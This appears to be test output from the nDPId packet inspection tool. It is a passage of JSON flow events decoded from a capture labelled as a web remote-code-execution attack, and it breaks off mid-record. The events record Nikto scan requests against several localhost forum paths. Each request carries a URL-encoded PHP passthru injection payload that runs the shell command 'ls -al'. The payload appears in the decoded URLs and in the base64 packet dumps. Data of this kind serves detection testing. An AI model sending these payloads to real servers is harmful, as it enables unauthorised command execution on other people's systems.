+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277808,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_packet_id":1,"flow_last_seen":1576420277808,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277808,"pkt":"AAAAAAAAAAAAAAAACABFAAFnxERAAEAGd0p\/AAABfwAAAcb+H5AIB\/1vYBeRA4AYAED\/WwAAAQEICp1m\/1idZv9YR0VUIC9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277808,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7560000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00905{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_packet_id":1,"flow_last_seen":1576420277810,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":382,"pkt_l4_len":348,"thread_ts_msec":1576420277810,"pkt":"AAAAAAAAAAAAAAAACABFAAFwFdRAAEAGJbJ\/AAABfwAAAccAH5A7eCz\/38X+m4AYAED\/ZAAAAQEICp1m\/1mdZv9ZR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01234{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7560000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7560000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277811,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_packet_id":1,"flow_last_seen":1576420277811,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"thread_ts_msec":1576420277811,"pkt":"AAAAAAAAAAAAAAAACABFAAF1vbdAAEAGfcl\/AAABfwAAAccCH5DikYSaCicX\/4AYAED\/aQAAAQEICp1m\/1udZv9bR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01240{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7560000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277811,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_packet_id":1,"flow_last_seen":1576420277812,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277812,"pkt":"AAAAAAAAAAAAAAAACABFAAFvwN5AAEAGeqh\/AAABfwAAAccEH5A7SvnykFHzA4AYAED\/YwAAAQEICp1m\/1ydZv9cR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCg0K"} 
+01233{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_packet_id":1,"flow_last_seen":1576420277813,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277813,"pkt":"AAAAAAAAAAAAAAAACABFAAFt2OpAAEAGYp5\/AAABfwAAAccGH5BS6uHGYiCIs4AYAED\/YQAAAQEICp1m\/12dZv9dR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277814,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_packet_id":1,"flow_last_seen":1576420277814,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277814,"pkt":"AAAAAAAAAAAAAAAACABFAAFt1fZAAEAGZZJ\/AAABfwAAAccIH5Bl1OzaDJYmQ4AYAED\/YQAAAQEICp1m\/16dZv9eR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277814,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277816,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_packet_id":1,"flow_last_seen":1576420277816,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277816,"pkt":"AAAAAAAAAAAAAAAACABFAAFmyD5AAEAGc1F\/AAABfwAAAccKH5CvpPET10Ucz4AYAED\/WgAAAQEICp1m\/2CdZv9gR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277816,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_packet_id":1,"flow_last_seen":1576420277817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277817,"pkt":"AAAAAAAAAAAAAAAACABFAAFvTQNAAEAG7oN\/AAABfwAAAccMH5C7inQwMMPyYoAYAED\/YwAAAQEICp1m\/2GdZv9hR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
+01233{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00907{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_packet_id":1,"flow_last_seen":1576420277819,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1576420277819,"pkt":"AAAAAAAAAAAAAAAACABFAAF0lOFAAEAGpqB\/AAABfwAAAccOH5D5PK3yk85ZF4AYAED\/aAAAAQEICp1m\/2KdZv9iR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01239{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 